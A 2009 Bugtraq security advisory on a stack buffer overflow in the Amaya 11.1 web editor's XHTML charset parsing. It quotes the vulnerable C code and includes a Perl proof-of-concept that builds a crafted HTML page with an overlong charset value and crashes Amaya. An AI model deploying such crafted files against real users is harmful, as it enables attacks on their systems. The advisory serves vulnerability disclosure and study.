Amaya 11.1 XHTML Parser Buffer Overflow

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Amaya 11.1 XHTML Parser Buffer Overflow
From: c1c4tr1z@xxxxxxxxxxxxxxx
Date: Fri, 3 Apr 2009 23:11:59 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#=cicatriz 
<c1c4tr1z@xxxxxxxxxxxxxxx>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
                                     /)           /)     /)                   
                        _ _  _______(/ ________  // _   (/_ _       _____  _  
                        (/__(_)(_)(_(_(_)(_)    (/_(_(_/_) /_)_ o  (_)/ (_(_/_
                                                                         .-/  
#=Amaya 11.1 XHTML Parser Buffer 
Overflow=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability 
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        Title: Amaya 11.1 XHTML Parser Buffer Overflow
        Advisory ID: VUDO-2009-0104
        Advisory URL: http://research.voodoo-labs.org/advisories/2
        Date founded: 2009-03-30
        Vendors contacted: N/A
        Class: Buffer Overflow
        Remotely Exploitable: Yes
        Locally Exploitable: Yes
        Exploit/PoC Available: Yes

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable 
packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [+] Amaya 11.1
        [+] Amaya 11
        
        Non tested but possible:
        [*] Amaya 10
        
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and 
Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Amaya is planning to release a newer version (11.2 snapshot) [1]

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical 
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

A stack buffer overflow have been discovered in the Amaya [1] Web Editor's 
XHTML parser function:
ParseCharsetAndContentType(), wich can be used to compromise the victim's 
system via arbitrary code execution.
 
The overflow occurs when the application process the "charset" type from a 
crafted HTML page.If the charset
has a large amount of chars can lead to a stack buffer overflow and, maybe, be 
exploited using printable ASCII
characters. When the application was debugged, it showed that the overflow 
occurs in the function 
"ParseCharsetAndContentType":

+++Amaya/amaya/XHTMLbuilder.c

    68  void ParseCharsetAndContentType (Element el, Document doc) 
    69  
    70  {
    71    AttributeType attrType;
    72    Attribute     attr;
    73    ElementType   elType;
    74    CHARSET       charset;
    75    char         *text, *text2, *ptrText, *str; XXX
    76    char          charsetname[MAX_LENGTH]; 
    77    int           length;
    78    int           pos, index = 0;
    79  
        ...
   125  
   126                        if (charset == UNDEFINED_CHARSET)
   127                          {
   128                            /* the charset is not already defined by the 
http header */
   129                            str = strstr (text2, "charset=");
   130                            if (str)
   131                              {
   132                                pos = str - text2 + 8;
   133                                while (text2[pos] != SPACE &&
   134                                       text2[pos] != TAB && text2[pos] != 
EOS)
   135                                  charsetname[index++] = text2[pos++]; XXX
   136                                charsetname[index] = EOS;
   137                                charset = TtaGetCharset (charsetname);
   138                                if (charset != UNDEFINED_CHARSET)
   139                                  TtaSetDocumentCharset (doc, charset, 
FALSE);
   140                              }
   141                          }
   142                        TtaFreeMemory (text2);
   143                      }       
   144                  } 
   145              }
   146            TtaFreeMemory (text);
   147          }
   148      }

---Amaya/amaya/XHTMLbuilder.c

So, the application creates a buffer called "charsetname" with a length of 1024 
bytes and then tries to fill
it with the charset type name, skipping the 8 bytes of "charset=", without 
making any type of length check.
If an HTML page has something like this it might produce the overflow:

+++
<meta http-equiv="Content-Type" content="text/html; 
charset="AAAAAAAAAAAAAAAAAAAAAAAA...x1922" />
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of 
Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

The following perl script creates an HTML file that reproduces the overflow:

+++amaya_poc.pl

#!/usr/bin/perl -w

# [*] Amaya 11.1 XHTML Parser Buffer Overflow POC
# [*] C1c4Tr1Z <c1c4tr1z@xxxxxxxxxxxxxxx>
## Copyright (c) 2008-2009 Voodoo Research Group.

my $filename="b0f.html";
my $b0f="\x41"x1922;
my $vulnerable=qq{
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset={b0f}">
</head>

<body>
</body>
</html>
};
#debug: "gdb -q --args \"/usr/lib/Amaya/wx/bin/amaya_bin\" ./$filename"
my $exec="/usr/lib/Amaya/wx/bin/amaya_bin ./$filename";

open(HTML, "> $filename") || die "[-] Error ($!). Exiting..\n";
$vulnerable=~s|(\{b0f\})+|$b0f|g;
print HTML $vulnerable;
close(HTML);

print "[+] File $filename created.\n";
print "[+] Setting enviroment variables..\n";

$ENV{'XLIB_SKIP_ARGB_VISUALS'}=1;
$ENV{'G_SLICE'}="always-malloc";

print "[+] Executing amaya\n";
sleep(3);
exec("clear; $exec");

---amaya_poc.pl

+++console
 $ perl amaya.pl
[+] File b0f.html created.
[+] Setting enviroment variables..
[+] Executing amaya

* Amaya: Error Irrecuperable ***Segmentation fault
 $ 
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting 
Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [*] 30-03-2009: Bug discovered.
        [*] 01-04-2009: Advisory VUDO-2009-3003 published without notifying the 
vendor.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

        [1] Amaya Project Homepage: http://www.w3.org/Amaya/

#=cicatriz 
<c1c4tr1z@xxxxxxxxxxxxxxx>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#=mié 01 abr 2009 
ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Prev by Date: [TKADV2009-005] xine-lib Quicktime STTS Atom Integer Overflow
Next by Date: [ GLSA 200904-05 ] ntp: Certificate validation error
Previous by thread: [TKADV2009-005] xine-lib Quicktime STTS Atom Integer Overflow
Next by thread: [ GLSA 200904-05 ] ntp: Certificate validation error
Index(es):
- Date
- Thread